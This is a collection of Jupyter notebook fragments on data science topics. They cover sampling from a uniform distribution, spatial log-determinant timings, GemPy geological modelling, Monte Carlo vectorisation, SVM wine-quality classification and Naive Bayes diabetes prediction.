# Test with a defined date
# 1381536182000 == 2013/10/12 02:03:02
message = Message("本周日到下周日出差", time="1381536182000")
c.process(message)
entities = message.get("entities")
print("total entities", len(entities))
for ent in entities:
print(ent)
test_time_entity_extractor(component_builder())
```
| github_jupyter |
```
# load your software stack
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
%matplotlib inline
# read the data in, describe it, and plot a histogram of the data
# the data are integers
mypop=pd.read_csv('mypopulation.dat',names=['data'])
print (mypop.describe())
plt.hist(mypop.data,bins=100,normed=False);
```
### This data is the so-called "uniform distribution"
1) What is the probability of drawing the number 5000?
2) How much of the range is covered by the standard deviation?
3) The uniform distribution has a standard deviation of: $\sigma = \sqrt{\frac{(MAX-MIN)^2}{12}}$ , how close is our data to this value?
4) The analytical answer to question 3 is: $\frac{1}{\sqrt{12}}$?
```
print (1.0/(mypop.data.max()-mypop.data.min()))
print ""
print (mypop.data.std()/(mypop.data.max()-mypop.data.min()))
print ""
print (np.sqrt(np.power(mypop.data.max(),2)/12))
print (mypop.data.std())
print ""
print (1/np.sqrt(12))
# if you get an error output of this cell - it may be your Python is not compatible with: print ""
```
### A "real world" scenario
* You are conducting experiments that measure data. The data are a _sample_ that come from the _population_ represented in the array `mypop.data`
* Your goal is to estimate properties of the _population_ by taking _samples_ , you will start by estimating the population mean
* You can control the sample `size`, i.e., how many points you collect in a given experiment
* You can also control the number of experiments `samples`, i.e., how many experiments you conduct
### To do:
* Change the size and # samples and study the output and look for any trends.
* Before you go crazy, I suggest being systematic, changing 1 variable at a time
* I also suggest you don't exceed a 1,0000,000 as the product of the `size x samples`
* Be exploratory - look for trends and try and understand what is happening
* If you want to see multiple `trials` just hit shift-enter and re-execute the same cell
### Before you run the next cell, please take a moment to make a prediction about what will happen!
#### Big picture: you are randomly sampling a set of 10,000,000 uniform random integers. What do you expect the distribution of sample means to look like?
#### My prediction is: << fill here >>
```
#you can control these
#how many data points you collect in each experiment
size=1
# how many experiments will you run
samples=2
#analysis of your data - you can ignore for now but what is happening is commented below
# initalize a vector of zeros that is of length of your # of samples
means=np.zeros(samples)
# iterate over the vector (currently all zeros), iterate in a way that
# makes each element writeable (this is not standard but convenient for our purpose)
# the total number of iterations is the total number of samples (experiments) performed
for x in np.nditer(means, op_flags=['readwrite']):
#take your data: this means you are randomly sampling the global population taking `size` points
data2=np.random.choice(mypop.data,size=size)
# update item x (this the ith experiment) with the sample mean
x[...]=np.mean(data2)
#plot the histogram of your experiments
plt.hist(means,range=[mypop.data.min(),mypop.data.max()],bins=100)
#print the absolute differnece between the population mean (mu) and average of all your experimental data (xbar)
print np.abs(mypop.mean()-means.mean())
#print the relative diff (mu-xbar)/mu
print np.abs((mypop.mean()-means.mean()))/mypop.mean()
```
| github_jupyter |
```
import theano.tensor as tt
import pysal as ps
import matplotlib.pyplot as plt
import seaborn.apionly as sns
import numpy as np
import pandas as pd
import ops
import distributions as spdist
import scipy.sparse as spar
import scipy.sparse.linalg as spla
import pymc3 as mc
%matplotlib inline
```
This notebook compares timings for log determinants of the form:
$$ log(|A|) = log(|I - \rho W|) $$
where $W$ is a row-standardized spatial linkage matrix of dimension $N \times N$ and $I$ is an identity matrix. These kinds of determinants are common in spatial models, where they are required for the covariance of a multivariate normal distribution.
For this example, I'll use the counties in Texas, Oklahoma, Arkansas, and Louisiana for an example.
```
df = ps.pdio.read_files(ps.examples.get_path('south.shp'))
df = df.query('STATE_NAME in ("Texas", "Oklahoma", "Arkansas", "Louisiana")')
W = ps.weights.Queen.from_dataframe(df)
W.transform = 'r'
print('There are {} observations in the problem frame'.format(W.n))
```
One method, that implemented recently in PyMC3, uses singular value decomposition to compute the log determinant of positive semidefinite covariance matrices common in multivariate normal distributions. In general, since the covariance matrix is positive semidefinite, we know its determinant is positive.
Since the product of singular values is equivalent to the magnitude of the determinant, the product of singular values for a positive semidefinite matrix is *exactly equal* to its determinant. Thus, with singular values $s_i$,
$$ \Pi_s s_i = |I - \rho W| \rightarrow \sum_i log(s_i) = log(|I - \rho W|) $$
This is great, since this means we can use efficient SVD methods already implemented in theano for the log determinant computations which typically have $O(n^3)$ complexity for our log determinant in this case, since the SVD is applied to square matrices and SVD on an $m \times n$ matrix has complexity $O(min(n^2m, m^2n))$, depending on whether $m$ or $n$ is larger.
While this is a good strategy, this results in the evaluation of an SVD of $A$ each time a determinant is required. In a Markov Chain Monte Carlo strategy, this means an SVD is required each iteration. Often, the number of iterations for an MCMC sampler exceeds the number of observations significantly.
Thus, what we're really looking for is fast determinants of a matrix with known *repeated* structure. If there were some way to pre-factor $A$ over a range of $\rho$, the cost of the matrix factorization would be amortized over $t$. One common approximation strategy is to do this prefactoring by evaluating $A$ at many $\rho$, and then storing the resulting log determinants and linearly-interpolating or inverse sampling between these values.
Another prefactoring strategy uses the eigenvalues of $W$. This is due to a proof by spatial statistician Keith Ord in 1975, and lets us compute $|A|$ as a linear-time function of the eigenvalues of $W$ and $\rho$:
$$ log|A| = \sum_i^n log(1 - \rho * e_i)$$
Thus, if $e_i$ is available, then this is attainable.
Additionally, $A$ is a sparse matrix, since $W$ is very sparse. For example, for an adjacency matrix for counties in TX, LA, AR, and OK, just shy of 1% of entries in the matrix are nonzero:
```
W.nonzero / W.n**2
```
Thus, a dedicated sparse matrix algorithm to compute the log determinant may provide speedups. Sparse matrix algorithms exploit the fact that so many elements of the matrix are zero and can often provide quantities of interest faster than a dense matrix algorithm.
An easy sparse algorithm for this problem uses `scipy.sparse.linalg.splu`, the SuperLU-backed Sparse LU Decomposition. Using a similar logic to the SVD strategy, an LU decomposition of $A$ is constructed:
$$ LU = A$$
and the sum of the logged absolute value of the diagonals provides the log determinant. Since the SuperLU algorithm provides $L$ with all ones on the diagonal, the upper triangular matrix can be used alone for the log determinant.
$$ log|A| = \sum_i^n(log(|U_{ii}|))$$
### Comparing the three methods
So, to compare speed, I'll look at the three methods on the very sparse but relatively small $470 \times 470$ matrix of counties in TX, OK, AR, and LA.
In the image below, the weights matrix is shown. Entries that are non-zero are in black. So, the matrix is very sparse and diagonally-dominant.
```
plt.imshow(W.sparse.toarray()>0, cmap='Greys')
```
Both the Ord and LU determinant `Op`s are specific to a given $W$, so they must be instantiated before running the comparison. For fairness, I'll measure the time it takes to instantiate either of them, and consider the number of evaluations of the log determinant that is necessary to justify the caching/precomputation.
In what follows, I run 1000 iterations of the log determinant computation for random $\rho$ in $[-1,1)$, the range of stable spatial autoregressive coefficients that are commonly encountered in practice. `sparse` contains the sparse LU decomposition, `dense` contains the standard PyMC3 SVD strategy, and `evals` contains the Ord Eigenvalue approach.
```
import time as t
sparse = []
dense = []
evals = []
Wd = W.sparse.toarray()
I = np.eye(W.n)
cache_time = t.time()
spld = ops.CachedLogDet(W)
cache_time = t.time() - cache_time
eval_time = t.time()
np.linalg.eigvals(Wd)
eval_time = t.time() - eval_time
for _ in range(1000):
rho = np.random.random()*2-1 #rho uniform over [-1,1)
etime = t.time()
result = spld(rho).eval()
etime = t.time() - etime
sparse.append((rho, result, etime))
A = I - rho * Wd
etime = t.time()
result = mc.math.logdet(A).eval()
etime = t.time() - etime
dense.append((rho, result, etime))
etime = t.time()
result = ordld(rho).eval()
etime = t.time() - etime
evals.append((rho, result, etime))
sparse = np.asarray(sparse)
dense = np.asarray(dense)
evals = np.asarray(evals)
```
First off, the log determinant recovered by all approaches is identical:
```
np.testing.assert_allclose(sparse[:,1], evals[:,1])
np.testing.assert_allclose(sparse[:,1], dense[:,1])
plt.scatter(sparse[:,0], sparse[:,1], label='Sparse', marker='o')
plt.scatter(evals[:,0], evals[:,1], label='evals', marker='^')
plt.scatter(dense[:,0], dense[:,1], marker='x', label='Dense')
plt.title('LogDet Values', fontsize=20)
plt.legend(fontsize=16, loc='lower center')
plt.xlabel(r'$\rho$', fontsize=16)
plt.ylabel(r'$log|A|$', fontsize=16)
```
Disregarding the precomputation time, the Eigenvalue method is the fastest both on average and in almost every pass. The sparse method takes over double the time that the eigenvalue method takes on average. And, the dense method takes over 10 times the time the sparse method requires, and nearly 30 times the average time for the eigenvalue method.
```
evals[:,2].mean(), sparse[:,2].mean(), dense[:,2].mean()
plt.scatter(sparse[:,0], sparse[:,2], label='Sparse', marker='o')
plt.scatter(evals[:,0], evals[:,2], label='Evals', marker='^')
plt.scatter(dense[:,0], dense[:,2], marker='x', label='Dense')
plt.title('Timings', fontsize=20)
plt.ylabel('Seconds', fontsize=16)
plt.xlabel(r'$\rho$', fontsize=16)
plt.legend(fontsize=16, ncol=3, bbox_to_anchor=(1.,-.2))
```
However, computing the eigenvalues takes a full two seconds of precomputation. So, for one-off log determinants, this method is exceedingly inefficient. However, after only seven evaluations of the log determinant, the precomputation method required by the eigenvalue strategy breaks even with the SVD time.
```
np.mean([eval_time] + evals[:,2][:6].tolist()), dense[:,2].mean()
```
However, it takes much longer to amorize the eigenvalue precomputation time compared to the sparse LU approach. The amortization curve for the sparse method is nearly flat, since the fraction of the total computation time consumed in precomputation is nearly zero. however, the amortization of the eigenvalue method is *very* steep, and becomes more efficient than the sparse evaluation method after around 125 evaluations of the log determinant.
```
support = np.arange(50,200,1)
plt.plot(support,
[np.mean(eval_time/k + evals[:,2].mean()) for k in support], label='Ord')
plt.plot(support,
[np.mean(cache_time/k + sparse[:,2].mean()) for k in support], label='SuperLU')
plt.title('Amoritzation Curve', fontsize=20)
plt.ylabel('Average Time', fontsize=20)
plt.xlabel('Evaluations of log$(|A|)$', fontsize=20)
plt.legend(fontsize=20)
```
In general, it's difficult to characterize how this scales with respect to $N$, since the structure of the connectivity matrix for additional observations greatly affects the speed of the various approaches. However, it appears that, in general, for sparse $W$, the sparse LU or eigenvalue strategy are much more efficient for this specific problem.
| github_jupyter |
```
# Importing GemPy
import gempy as gp
# Importing aux libraries
from ipywidgets import interact
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from gempy.plot import visualization_2d as vv
from gempy.plot import vista
```
## Loading the xarray
We want to import the data from disk, where it is stored as a netCDF file.
```
import xarray as xr
fat_grid = xr.open_dataset('../data/fatiando_gridded_data.nc')
fat_grid
```
## Initializating model
First we create a model to store things in.
```
geo_model = gp.create_model('From_Fatiando')
# We will create the regular grid afterwards
geo_model = gp.init_data(geo_model)
geo_model.add_surfaces(['mag_surface', 'basement'])
gp.set_interpolator(geo_model, theano_optimizer='fast_compile', verbose=[])
```
### Xarray to pandas
This seems to give something reasonably shaped.
Our next issue is to add points and surfaces. In theory, we can use each axis to create the points, but that will almost certainly be too many.
GemPy expects to be given a `DataFrame`, not a `Dataset`, so we will need to convert it. It also expects to find the columns `X|x`, `Y|y`, `Z|z` and one of `surface`, `Surface`, `surfaces`, `surfaces`, `formations`, or `formation`, which probably do not exist from harmonica by default.
Note: being able to set this might be nice if I am importing a cube of points.
```
df_fat_grid = fat_grid.to_dataframe()
df_fat_grid.reset_index(inplace=True)
new_columns = {'easting': 'X',
'northing': 'Y',
}
df_fat_grid.rename(columns=new_columns, inplace=True)
df_fat_grid['surface'] = 'mag_surface'
# Adding Z anisotropy
df_fat_grid['Z'] = df_fat_grid['magnetic_anomaly'] * 50
df_fat_grid
```
### Decimating surface points
We need to decimate the data somehow, so that we have fewer points.
```
dec_df_fat_grid = df_fat_grid.iloc[::150].reset_index()
# Setting the df to gempy
geo_model.set_surface_points(dec_df_fat_grid,
update_surfaces=False)
```
#### Creating one orientation (minimum required)
The minimum amout of data for GemPy is:
- 2 surface points per surface
- 1 orientations per series
Note: I am not sure what happened with the error message about this. We need a patch
```
# Create a dummy orientation far away from the model
geo_model.add_orientations(-323835.075764, 4.223884e+06, 36000.098226, pole_vector=(0,0,1), surface='mag_surface')
```
## Adding grid around
The model needs some extents, in the format `[x_min, x_max, y_min, y_max, z_min, z_max]`.
We want to use the extents from the fatiando grid, which we can extract thus. The z coords are a little weird, so I am guessing them for now. This would presumably be how deep you expect your model to actually extend. For mag data, a couple of km seems reasonable for now, but we want to vertically exaggerate things, in this case by a factor of 50.
```
geo_model.set_regular_grid([geo_model.surface_points.df['X'].min(),
geo_model.surface_points.df['X'].max(),
geo_model.surface_points.df['Y'].min(),
geo_model.surface_points.df['Y'].max(),
geo_model.surface_points.df['Z'].min(),
geo_model.surface_points.df['Z'].max()], [50,50,50])
p3d = gp.plot_3d(geo_model)
geo_model.surfaces.df
# The default value of the covariance is 0 because we didn't
# have orientations when we use set_interpolator
geo_model.additional_data
# To set the default values now that all data is in place
# we need to call the followin
geo_model.update_additional_data()
geo_model.update_to_interpolator()
gp.compute_model(geo_model)
```
The above error seems to be from placing points outside the plotting area.
```
p3d = gp.plot_3d(geo_model, plotter_type='background')
# With this you can just move the points
p3d.toggle_live_updating()
```
It seems that the range is too large
```
# Range defines how close the parameters influence each other
geo_model.modify_kriging_parameters('range', 20000)
p3d.update_surfaces()
p3d.update_surfaces()
# Smooth controls how close the surface goes trough the points
geo_model.modify_surface_points(geo_model.surface_points.df.index, smooth=1000, plot_object=p3d)
geo_model.orientations
gp.plot_3d(geo_model, image=True)
```
| github_jupyter |
# Aprendizaje Automático y Big Data
## Práctica 0: Vectorización
Guillermo García Patiño Lenza
Mario Quiñones Pérez
### Objetivos :
En esta práctica se pretende demostrar que el cálculo vectorizado que realiza Numpy es mucho más eficiente que realizar los mismos cálculos empleando bucles tradicionales de python. Para ello, se ha implementado el método Monte Carlo para calcular la integral definida de una función entre los dos puntos de ambas maneras y se han comparado los tiempos de ejecución obtenidos para diferentes cantidades de puntos aleatorios que se emplean para el cálculo
### Funciones Implementadas :
#### 1. Integra_mc :
Esta función recibe como parámetros: la expresión de la función a integrar (func), los dos puntos entre los que se quiere calcular la integral definida (a y b), y el número de puntos aleatorios (num_puntos) que se generarán para aproximar el cálculo. Después, calcula el máximo aproximado de la función recibida (max), genera num_puntos aleatorios en el intervalo (a,b) y otros num_puntos en el intervalo (0,max), calcula la imagen de los primeros num_puntos y obtiene el cociente (c) entre el número de pares (x,y) generados aleatoriamente que cumplen que y <= func(y) y el número de puntos total. Finalmente, la estimación de la integral se calcula como el producto A = c * (b-a) * max
```
def integra_mc(func, a, b, num_puntos = 100):
puntos = np.linspace(a,b,num_puntos)
m = max(func(puntos))
fxpuntos = func((np.random.randint(a, size = num_puntos)) + (b-a))
ypuntos = np.random.randint(m, size=num_puntos)
menores = ypuntos < fxpuntos
por_debajo = sum(menores)
return (por_debajo / num_puntos)*(b-a)*m
```
#### 2. Integra_mc1:
Esta función realiza el mismo cálculo que la anterior pero empleando bucles tradicionales de python
```
def integra_mc1(func, a, b, num_puntos = 10000):
punto_f = func(a)
por_debajo = 0
for num in range(num_puntos):
aux = a + (b-a)*num/num_puntos
aux_f = func(aux)
if aux_f > punto_f:
punto_f = aux_f
for num in range(num_puntos):
fx = func((random.randrange(a)) + (b-a))
y = random.randrange(int(punto_f))
if y < fx:
por_debajo = por_debajo + 1
return (por_debajo / num_puntos)*(b-a)*punto_f
```
#### 3. Toma_tiempos:
Esta función calcula la integral de la función f entre los puntos que recibe como parametro para varios valores de num_puntos, anotando el tiempo que tarda cada una de las ejecuciones y almacenándolo.
```
def toma_tiempos(f, a, b):
t_bucles = []
t_vectorizado = []
tamanios = np.linspace(1,100000,100, dtype = int)
for i in tamanios:
tv = tiempo_vectorizado(f,a,b,i)
tb = tiempo_bucles(f,a,b,i)
t_bucles += [tb]
t_vectorizado += [tv]
return (t_bucles,t_vectorizado,tamanios)
```
#### 4. Main:
Se trata del punto de entrada al programa. Esta función se encarga de extraer los puntos entre los que se va a integrar la función desde los argumentos con los que se llama al programa, de generar la gráfica con los tiempos, y de guardarla en un png.
```
import sys
import numpy as np
import random
import time
import matplotlib.pyplot as plt
def func (x) :
return -(x**2)+ 5*x + 5
def main():
args = sys.argv
# a, b = args[1], args[2]
a, b = 2, 5
t = toma_tiempos(func,a,b)
#bucles, vectorizado, tamaños
plt.figure()
plt.scatter(t[2],t[0], c = 'red', label = 'bucle')
plt.scatter(t[2],t[1], c = 'blue', label = 'vectorizado')
plt.legend()
plt.show()
plt.savefig('tiempos2.png')
```
### Conclusiones:
Después de ejecutar el código anterior, hemos obtenido la siguiente gráfica, que muestra como claramente es más eficiente emplear Numpy para este tipo de cálculos que hacerlos con bucles tradicionales. Para generar la gráfica se han empleado 1.000 valores diferentes entre 1 y 1.000.000 para ambos métodos de cálculo.
Como última nota hay que destacar que, aunque parece que la diferencia en eficiencia no es tan notable, para casos más grandes que estos la diferencia debería notarse mucho más tanto en la gráfica como en el tiempo real de ejecución

| github_jupyter |
# Data description & Problem statement:
The dataset is related to red vinho verde wine samples, from the north of Portugal. The goal is to model wine quality based on physicochemical tests. For more details, please check: https://archive.ics.uci.edu/ml/datasets/wine+quality
* Dataset is imbalanced. The data has 4898 rows and 12 columns.
* This is a classification problem. The classification goal is to predict wine quality based on physicochemical tests.
# Workflow:
- Load the dataset, and define the required functions (e.g. for detecting the outliers)
- Data Cleaning/Wrangling: Manipulate outliers, missing data or duplicate values, Encode categorical variables, etc.
- Split data into training & test parts (utilize the training part for training & hyperparameter tuning of model, and test part for the final evaluation of model)
# Model Training:
- Build an initial SVM model, and evaluate it via C-V approach
- Use grid-search along with C-V approach to find the best hyperparameters of SVM model: Find the best SVM model (Note: I've utilized SMOTE technique via imblearn toolbox to synthetically over-sample the minority category and even the dataset imbalances.)
# Model Evaluation:
- Evaluate the best SVM model with optimized hyperparameters on Test Dataset, by calculating:
- AUC score
- Confusion matrix
- ROC curve
- Precision-Recall curve
- Average precision
```
import sklearn
import tensorflow as tf
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn import preprocessing
%matplotlib inline
from scipy import stats
import warnings
warnings.filterwarnings("ignore")
# Function to remove outliers (all rows) by Z-score:
def remove_outliers(X, y, name, thresh=3):
L=[]
for name in name:
drop_rows = X.index[(np.abs(X[name] - X[name].mean()) >= (thresh * X[name].std()))]
L.extend(list(drop_rows))
X.drop(np.array(list(set(L))), axis=0, inplace=True)
y.drop(np.array(list(set(L))), axis=0, inplace=True)
print('number of outliers removed : ' , len(L))
df=pd.read_csv('C:/Users/rhash/Documents/Datasets/wine quality/winequality-red.csv', sep=';')
df['quality']=df['quality'].map({3:'L', 4:'L', 5:'L', 6:'L', 7:'H', 8:'H'})
df['quality']=df['quality'].map({'L':0, 'H':1})
# To Shuffle the data:
np.random.seed(42)
df=df.reindex(np.random.permutation(df.index))
df.reset_index(inplace=True, drop=True)
df.head()
df.info()
X=df.drop('quality', axis=1)
y=df['quality']
# We initially devide data into training & test folds: We do the Grid-Search only on training part
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42)
# Removing outliers:
remove_outliers(X_train, y_train, ['fixed acidity', 'volatile acidity', 'citric acid', 'residual sugar',
'chlorides', 'free sulfur dioxide', 'total sulfur dioxide', 'density',
'pH', 'sulphates', 'alcohol'], thresh=9)
from sklearn.preprocessing import StandardScaler, MinMaxScaler
scaler=MinMaxScaler().fit(X_train)
X_train=scaler.transform(X_train)
X_test=scaler.transform(X_test)
# We build the Initial Model & Cross-Validation:
from sklearn.svm import SVC
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import StratifiedKFold
model=SVC(C=10, gamma=0.1, random_state=42)
kfold=StratifiedKFold(n_splits=5, shuffle=True, random_state=42)
scores=cross_val_score(model, X_train, y_train, cv=kfold, scoring="roc_auc")
print(scores, "\n")
print("Accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std()))
# Grid-Serach for the best model parameters:
# Rough Search (Round 1)
from sklearn.model_selection import GridSearchCV
param={'kernel':['rbf'], 'C': [0.1, 0.5, 1, 5, 10, 100, 1000], 'gamma':[0.1, 0.5, 1, 5, 10, 15, 20, 25]}
kfold=StratifiedKFold(n_splits=4, shuffle=True, random_state=42)
grid_search=GridSearchCV(SVC(class_weight='balanced'), param, cv=kfold, scoring="roc_auc", n_jobs=-1)
grid_search.fit(X_train, y_train)
# Grid-Search report:
G=pd.DataFrame(grid_search.cv_results_)
G.sort_values("rank_test_score").head(3)
print("Best parameters: ", grid_search.best_params_)
print("Best validation accuracy: %0.2f (+/- %0.2f)" % (np.round(grid_search.best_score_, decimals=2), np.round(G.loc[grid_search.best_index_,"std_test_score" ], decimals=2)))
print("Test score: ", np.round(grid_search.score(X_test, y_test),2))
h=G[["param_C", "param_gamma", "mean_test_score"]].pivot_table(index="param_C", columns="param_gamma", values="mean_test_score")
sns.heatmap(h, annot=True)
from sklearn.metrics import roc_curve, auc, confusion_matrix, classification_report
# Plot a confusion matrix.
# cm is the confusion matrix, names are the names of the classes.
def plot_confusion_matrix(cm, names, title='Confusion matrix', cmap=plt.cm.Blues):
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(names))
plt.xticks(tick_marks, names, rotation=45)
plt.yticks(tick_marks, names)
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
class_names=["0", "1"]
# Compute confusion matrix
cm = confusion_matrix(y_test, grid_search.predict(X_test))
np.set_printoptions(precision=2)
print('Confusion matrix, without normalization')
print(cm)
# Normalize the confusion matrix by row (i.e by the number of samples in each class)
cm_normalized = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print('Normalized confusion matrix')
print(cm_normalized)
plt.figure()
plot_confusion_matrix(cm_normalized, class_names, title='Normalized confusion matrix')
plt.show()
# Classification report:
report=classification_report(y_test, grid_search.predict(X_test))
print(report)
# ROC curve & auc:
from sklearn.metrics import precision_recall_curve, roc_curve, roc_auc_score, average_precision_score
fpr, tpr, thresholds=roc_curve(np.array(y_test), grid_search.decision_function(X_test) , pos_label=1)
roc_auc=roc_auc_score(np.array(y_test), grid_search.decision_function(X_test))
plt.figure()
plt.step(fpr, tpr, color='darkorange', lw=2, label='ROC curve (auc = %0.2f)' % roc_auc)
plt.plot([0, 1], [0, 1], color='navy', alpha=0.4, lw=2, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC curve')
plt.legend(loc="lower right")
plt.plot([cm_normalized[0,1]], [cm_normalized[1,1]], 'or')
plt.show()
# Precision-Recall trade-off:
precision, recall, thresholds=precision_recall_curve(y_test,grid_search.decision_function(X_test), pos_label=1)
ave_precision=average_precision_score(y_test,grid_search.decision_function(X_test))
plt.step(recall, precision, color='navy')
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.ylim([0, 1.01])
plt.xlim([0, 1.001])
plt.title('Precision-Recall curve: AP={0:0.2f}'.format(ave_precision))
plt.plot(cm_normalized[1,1], cm[1,1]/(cm[1,1]+cm[0,1]), 'ob')
plt.show()
```
| github_jupyter |
```
%matplotlib inline
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from sklearn.naive_bayes import BernoulliNB, GaussianNB
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.metrics import confusion_matrix, auc, roc_curve, roc_auc_score, classification_report
from sklearn.metrics import recall_score, precision_score, accuracy_score, f1_score
np.random.seed(44)
def print_scores(y_test, y_pred, y_pred_prob):
print('recall score:',recall_score(y_test, y_pred))
print('precision score:',precision_score(y_test, y_pred))
print('f1 score (weighted average of the precision and recall):',f1_score(y_test, y_pred))
print('accuracy score:',accuracy_score(y_test,y_pred))
df = pd.read_csv('data/diabetes.csv')
df.head()
print("Outcome as pie chart:")
fig, ax = plt.subplots(1, 1)
ax.pie(df.Outcome.value_counts(),autopct='%1.1f%%', labels=['Diabetes','No Diabetes'], colors=['yellowgreen','r'])
plt.axis('equal')
plt.ylabel('')
##### plot Time to see if there is any trend
print("Age")
print(df["Age"].tail(5))
fig, (ax1, ax2) = plt.subplots(2, 1, sharex = True, figsize=(6,3))
ax1.hist(df.Age[df.Outcome==0], bins=40, color='g',alpha=0.5)
ax1.set_title('Not Diabetes')
ax1.set_xlabel('Age')
ax1.set_ylabel('# of Cases')
ax2.hist(df.Age[df.Outcome==1], bins=40, color='r',alpha=0.5)
ax2.set_title('Diabetes')
ax2.set_xlabel('Age')
ax2.set_ylabel('# of Cases')
fig, (ax3,ax4) = plt.subplots(2,1, figsize = (6,3), sharex = True)
ax3.hist(df.Pregnancies[df.Outcome==0],bins=50, color='g',alpha=0.5)
ax3.set_title('Not Diabetes')
ax3.set_ylabel('# of Cases')
ax4.hist(df.Pregnancies[df.Outcome==1],bins=50, color='r',alpha=0.5)
ax4.set_title('Diabetes')
ax4.set_xlabel('Pregnancies')
ax4.set_ylabel('# of Cases')
import seaborn as sns
import matplotlib.gridspec as gridspec
gs = gridspec.GridSpec(28, 2)
plt.figure(figsize=(15,28*5))
for i, col in enumerate(df[ df.iloc[:,0:8].columns]):
ax = plt.subplot(gs[i])
sns.distplot(df[col][df.Outcome == 1], kde=True, bins=50, color='g')
sns.distplot(df[col][df.Outcome == 0], kde=True, bins=50, color='r')
ax.set_xlabel('')
ax.set_ylabel('# of cases')
ax.set_title('feature: ' + str(col))
plt.show()
corr
X = df.drop('Outcome', axis=1).values
y = df['Outcome'].values
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42, stratify=y)
print("Length of training labels:", len(y_train))
print("Length of testing labels:", len(y_test))
print("Length of training features:", len(X_train))
print("Length of testing features:", len(X_test))
```
# Bernoulli Naive-Bayes
```
bnb = BernoulliNB()
bnb.fit(X_train, y_train)
y_pred = bnb.predict(X_test)
confusion_matrix(y_test, y_pred)
pd.crosstab(y_test, y_pred, rownames=['True'], colnames=['Predicted'], margins=True)
print(classification_report(y_test, y_pred))
y_pred_proba = bnb.predict_proba(X_test)[:,1]
fpr, tpr, thresholds = roc_curve(y_test, y_pred_proba)
plt.plot([0,1],[0,1], 'k--')
plt.plot(fpr, tpr, label='BNB')
plt.xlabel('fpr')
plt.ylabel('tpr')
plt.title('Bernoulli Naive-Bayes ROC Curve')
plt.show()
roc_auc_score(y_test, y_pred_proba)
```
# Gaussian Naive-Bayes
```
gnb = GaussianNB()
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42, stratify=y)
gnb.fit(X_train, y_train)
y_pred = gnb.predict(X_test)
confusion_matrix(y_test, y_pred)
pd.crosstab(y_test, y_pred, rownames=['True'], colnames=['Predicted'], margins=True)
print(classification_report(y_test, y_pred))
y_pred_proba = gnb.predict_proba(X_test)[:,1]
fpr, tpr, thresholds = roc_curve(y_test, y_pred_proba)
plt.plot([0,1],[0,1], 'k--')
plt.plot(fpr, tpr, label='GNB')
plt.xlabel('fpr')
plt.ylabel('tpr')
plt.title('Gaussian Naive-Bayes ROC Curve')
plt.show()
roc_auc_score(y_test, y_pred_proba)
```
### Drop BMI
```
df = df.drop('BMI', axis=1)
X = df.drop('Outcome', axis=1).values
y = df['Outcome'].values
df
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42, stratify=y)
gnb.fit(X_train, y_train)
y_pred = gnb.predict(X_test)
confusion_matrix(y_test, y_pred)
pd.crosstab(y_test, y_pred, rownames=['True'], colnames=['Predicted'], margins=True)
print(classification_report(y_test, y_pred))
y_pred_proba = gnb.predict_proba(X_test)[:,1]
fpr, tpr, thresholds = roc_curve(y_test, y_pred_proba)
plt.plot([0,1],[0,1], 'k--')
plt.plot(fpr, tpr, label='GNB')
plt.xlabel('fpr')
plt.ylabel('tpr')
plt.title('Gaussian Naive-Bayes ROC Curve')
plt.show()
roc_auc_score(y_test, y_pred_proba)
```
### Drop Pregnancies
```
df = pd.read_csv('diabetes.csv')
df = df.drop('Pregnancies', axis=1)
X = df.drop('Outcome', axis=1).values
y = df['Outcome'].values
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42, stratify=y)
gnb.fit(X_train, y_train)
y_pred = gnb.predict(X_test)
confusion_matrix(y_test, y_pred)
pd.crosstab(y_test, y_pred, rownames=['True'], colnames=['Predicted'], margins=True)
print(classification_report(y_test, y_pred))
y_pred_proba = gnb.predict_proba(X_test)[:,1]
fpr, tpr, thresholds = roc_curve(y_test, y_pred_proba)
plt.plot([0,1],[0,1], 'k--')
plt.plot(fpr, tpr, label='GNB')
plt.xlabel('fpr')
plt.ylabel('tpr')
plt.title('Gaussian Naive-Bayes ROC Curve: Drop Pregnancies')
plt.show()
roc_auc_score(y_test, y_pred_proba)
```
### Drop Insulin
```
df = pd.read_csv('diabetes.csv')
df = df.drop('Insulin', axis=1)
X = df.drop('Outcome', axis=1).values
y = df['Outcome'].values
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42, stratify=y)
gnb.fit(X_train, y_train)
y_pred = gnb.predict(X_test)
confusion_matrix(y_test, y_pred)
pd.crosstab(y_test, y_pred, rownames=['True'], colnames=['Predicted'], margins=True)
print(classification_report(y_test, y_pred))
y_pred_proba = gnb.predict_proba(X_test)[:,1]
fpr, tpr, thresholds = roc_curve(y_test, y_pred_proba)
plt.plot([0,1],[0,1], 'k--')
plt.plot(fpr, tpr, label='GNB')
plt.xlabel('fpr')
plt.ylabel('tpr')
plt.title('Gaussian Naive-Bayes ROC Curve: Drop Insulin')
plt.show()
roc_auc_score(y_test, y_pred_proba)
```
## Drop DiabetesPedigreeFunction
```
df = pd.read_csv('diabetes.csv')
df = df.drop('DiabetesPedigreeFunction', axis=1)
X = df.drop('Outcome', axis=1).values
y = df['Outcome'].values
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42, stratify=y)
gnb.fit(X_train, y_train)
y_pred = gnb.predict(X_test)
confusion_matrix(y_test, y_pred)
pd.crosstab(y_test, y_pred, rownames=['True'], colnames=['Predicted'], margins=True)
print(classification_report(y_test, y_pred))
